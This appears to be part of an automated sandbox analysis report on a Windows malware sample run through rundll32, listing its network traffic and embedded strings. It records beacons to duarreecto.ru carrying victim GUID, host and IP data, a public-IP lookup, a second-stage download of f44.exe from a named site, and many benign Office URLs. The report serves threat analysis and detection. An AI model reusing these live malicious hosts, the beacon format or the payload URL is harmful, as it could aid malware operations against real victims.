Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: global traffic HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F8328D0 lstrlenA,lstrlenA,InternetCrackUrlA,InternetConnectA,HttpOpenRequestA,InternetCloseHandle,InternetQueryOptionA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 3_2_6F8328D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6F8328D0 lstrlenA,lstrlenA,InternetCrackUrlA,InternetConnectA,HttpOpenRequestA,InternetCloseHandle,InternetQueryOptionA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 3_2_6F8328D0
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /f44.exe HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sturtevantforcongress.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /f44.exe HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sturtevantforcongress.comCache-Control: no-cache
Source: unknown DNS traffic detected: queries for: api.ipify.org
Source: unknown DNS traffic detected: queries for: api.ipify.org
Source: unknown HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: unknown HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
Source: rundll32.exe String found in binary or memory: http://api.ipify.org
Source: rundll32.exe, 00000003.00000002.524132433.000000006F834000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000003.361304939.0000000002730000.00000040.00000001.sdmp String found in binary or memory: http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://api.aadrm.com/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://api.diagnostics.office.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://api.office.net
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://api.onedrive.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://augloop.office.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://augloop.office.com/v2
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://autodiscover-s.outlook.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://cdn.entity.
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://clients.config.office.net/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://config.edge.skype.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://cortana.ai
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://cr.office.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://devnull.onenote.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://directory.services.
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://graph.ppe.windows.net
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://graph.ppe.windows.net/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://graph.windows.net
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://graph.windows.net/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://lifecycle.office.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://login.microsoftonline.com/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://login.windows.local
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://management.azure.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://management.azure.com/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://messaging.office.com/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://ncus-000.contentsync.
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://ncus-000.pagecontentsync.
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://officeapps.live.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://onedrive.live.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://onedrive.live.com/embed?
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://outlook.office.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://outlook.office365.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://powerlift-user.acompli.net
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://powerlift.acompli.net
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://settings.outlook.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://store.office.com/addinstemplate
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://tasks.office.com
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://templatelogging.office.com/client/log
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://web.microsoftstream.com/video/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://wus2-000.contentsync.
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://wus2-000.pagecontentsync.
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 82F80B81-428D-49F0-9DFE-9BD3D7E39D80.0.dr String found in binary or memory: https://www.odwebp.svc.ms
Source: rundll32.exe String found in binary or memory: http://api.ipify.org
